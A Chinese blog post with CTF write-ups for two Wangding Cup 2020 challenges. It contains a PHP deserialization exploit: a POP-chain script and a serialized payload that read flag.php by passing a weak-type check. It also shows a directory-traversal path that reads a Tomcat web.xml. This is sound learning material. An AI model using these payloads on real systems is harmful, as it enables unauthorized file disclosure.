害,吃了不会js代码的亏,很难受,就做出了一个题,好像有道注入的题,也没有时间看。js要赶紧开始学了

js学了就复现

AreUSerialz

看到源码就知道是反序列化的题

<?php

include("flag.php");

highlight_file(__FILE__);

class FileHandler {

    protected $op;
    protected $filename;
    protected $content;

    function __construct() {
        $op = "1";
        $filename = "/tmp/tmpfile";
        $content = "Hello World!";
        $this->process();
    }

    public function process() {
        if($this->op == "1") {
            $this->write();
        } else if($this->op == "2") {
            $res = $this->read();
            $this->output($res);
        } else {
            $this->output("Bad Hacker!");
        }
    }

    private function write() {
        if(isset($this->filename) && isset($this->content)) {
            if(strlen((string)$this->content) > 100) {
                $this->output("Too long!");
                die();
            }
            $res = file_put_contents($this->filename, $this->content);
            if($res) $this->output("Successful!");
            else $this->output("Failed!");
        } else {
            $this->output("Failed!");
        }
    }

    private function read() {
        $res = "";
        if(isset($this->filename)) {
            $res = file_get_contents($this->filename);
        }
        return $res;
    }

    private function output($s) {
        echo "[Result]: <br>";
        echo $s;
    }

    function __destruct() {
        if($this->op === "2")
            $this->op = "1";
        $this->content = "";
        $this->process();
    }

}

function is_valid($s) {
    for($i = 0; $i < strlen($s); $i++)
        if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))
            return false;
    return true;
}

if(isset($_GET{'str'})) {

    $str = (string)$_GET['str'];
    if(is_valid($str)) {
        $obj = unserialize($str);
    }

}

利用的姿势也是非常简单,最容易利用的就是read这里,pop链也非常好写,看了一下只要op == ‘2’ 即可调用

(wp是赛后在buu复现写的,但比赛的时候只能用绝对路径打,赛后看有的师傅提到这样一张图)

最关键的地方是,is_valid这里,传入的数据,每个字符都会被检测,ascII必须 在32-125之间

function is_valid($s) { for($i = 0; $i < strlen($s); $i++) if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125)) return false; return true; }

因为变量都是protected类型,类前面需要加上%00*%00,(不可见符),%这刚好会被is_valid拦掉,没办法进入下一步的反序列化操作.

这里因为题目环境是php7+,对类型不敏感,所以本地pop链用public类型就可以绕过。

本地调试发现,在执行pop构造的内容前,会先执行_destruct(),这里op进行了强比较 op === “2”

(本地调试好麻烦,要遍历一遍数据….)

但是进入process调用read之前,进行了一次弱比较 op == “2”

可以用弱类型 2 == “2” 将op改为int类型

pop:

<?php
class FileHandler {
    public $op=2;
    public $filename="flag.php";
    public $content="";
}
$a=new FileHandler();
echo serialize($a);
?>
payload:O:11:"FileHandler":3:{s:2:"op";i:2;s:8:"filename";s:8:"flag.php";s:7:"content";s:0:"";}
notes

传送门(复现写在了js原型链总结的blog里)

filejava

是个上次页面,信息收集的时候,随便上传一个jpg后,发现可以下载

抓包,发现了url里的疑点,应该是可以任意下载文件

直接尝试下载flag,发现8行hhh,被拦了

尝试获取一下源码吧

首先随便尝试打一下,发现了路径

发现路径的信息不太熟悉,Google了一下,发现tomcat下的webapp,在WEB-INF目录下存在一个web.html,尝试读取

../../../../../../../../../usr/local/tomcat/webapps/ROOT/WEB-INF/web.xml

随后发现了3个class,下载后反编译

对8起,我8太会java,审计就到这里了,审计半天,主要还是8太熟悉java,要赶紧学起来了

看了wp考点是excel&xxe(CVE-2014-3529)

看懂了再补坑

学习链接:

https://www.cnblogs.com/Qian123/p/5271303.html


1 条评论

知识点总结part5-php反序列化 – M0n1ca's blog · 2020年8月1日 下午6:52

[…] 一个小Trick 这里因为题目环境是php7+,对类型不敏感,所以本地pop链用public类型就可以绕过//2020网鼎杯青龙组AreUSerialz […]

发表评论

电子邮件地址不会被公开。 必填项已用*标注